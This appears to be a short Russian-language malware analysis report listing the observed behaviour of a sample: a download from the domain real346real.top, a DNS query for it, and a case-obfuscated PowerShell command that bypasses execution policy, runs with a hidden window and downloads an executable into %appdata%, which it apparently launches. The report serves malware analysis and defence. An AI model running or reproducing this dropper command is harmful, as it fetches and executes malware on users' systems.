Техническая информация
- http://real346real.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poweRshElL.ExE -EXecUtiONPOlicy bYpASs -NOProFIlE -WindOwsTyle HiddeN (nEw-oBJecT sYSTEM.NET.WebClienT).DowNlOaDFILE('http://real346real.top/search.php','%aPPdAtA%.EXe');stA...
- DNS ASK re###46real.top
- '<SYSTEM32>\cmd.exe' /C "poweRshElL.ExE -EXecUtiONPOlicy bYpASs -NOProFIlE -WindOwsTyle HiddeN (nEw-oBJecT sYSTEM.NET.WebClienT).DowNlOaDFILE('http://real346real.top/search.php','%aPPdAtA%.EXe');stA...' (со скрытым окном)